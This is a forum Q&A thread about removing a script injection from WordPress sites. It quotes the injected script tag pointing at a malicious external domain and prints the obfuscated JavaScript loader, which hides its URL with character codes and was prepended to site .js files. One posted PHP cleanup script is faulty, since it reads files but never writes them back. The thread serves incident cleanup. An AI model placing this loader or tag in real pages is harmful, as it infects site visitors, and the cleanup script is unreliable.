# Remove malware line of text from multiple files in Linux

Tags: malware

Recently I have noticed that all my WP sites have injected malware in all the index.php files. I have identified the problem and patch it, however I can not delete the malware linces from the files. I tried this command:

```
find . -name "*.php" -exec sed -i 's/<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'></script>><//' {} \;
```

but I get error:

> find: missing argument to `-exec'

so I guess I have syntax error. Can you please tell me the exact command to delete in all files this line:

```
<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'></script>
```

Comment: Hi, would you mind letting me know where your site is hosted, I have encountered the same issue in hostpresto? WP version 4.7.2

Answer (score 2):

This is the line I used, I had thee same problem this morning.

```
    grep -rl "<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>" | xargs sed -i "s/<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>//g"
```

Answer (score 1):

Check if the plugin "super-socialat" exists and delete it, this is malware too. We found this plugin on all sites with this **** malware.

And please check if adminer.php is uploaded to your server. It seems to be their using adminer to hack the sites:

https://sansec.io/labs/2019/01/17/adminer-4.6.2-file-disclosure-vulnerability/
https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool

Answer (score 0):

i have a same problem

1. i add 127.0.0.1 trasnaltemyrecords.com into /etc/hosts
2. `grep -r * 'scripts.trasnaltemyrecords.com' > file_with_scripts.txt`
3. With this script, i remove this injection

   ```
   $txt_file    = file_get_contents('file_with_scripts.txt');
   $rows        = explode("\n", $txt_file);
   array_shift($rows);
   foreach($rows as $row => $data)
   {
       $filename = $data ;
       $file = fopen($filename, 'rw');
       $contents = fread($file, filesize($filename));
       $new_content = preg_replace('/^<script(.*)script>/i', '', $contents);
       echo $new_content;
       fclose($file);
   }
   ```

Check your database if you use ACF
Check too this topic in Wordpress.org

https://wordpress.org/support/topic/malware-found-injected-script/

Comment: can you check the script ? When i try to execute it give me error:

./script: line 1: syntax error near unexpected token `('
./script: line 1: `$txt_file = file_get_contents ('file_with_scripts.txt');'

Answer (score 0):

I encountered the same problem.
The script is not in file, it's in database.

```
<script src='https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043' type='text/javascript'></script>
```

Use better search and replace plugin to replace it with blank.

Answer (score 0):

The JS files are also affected.

I ran `find -type f -mtime -1`

and found this code prepended to all my .js files.

```
var gdjfgjfgj235f = 1; var d=document;var s=d.createElement('script');
s.type='text/javascript'; s.async=true; 
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
```

Answer (score 0):

wordpress's temp-crawl.php causes the issue.

i have wp and native php sites in the server. suspicious filer re index.* they have this script line mentioned above

also every .js files re infected as well.

and there s a file in the root directory wp-craft-report-conf.php must be deleted.

then it seems everything is working well. at least for now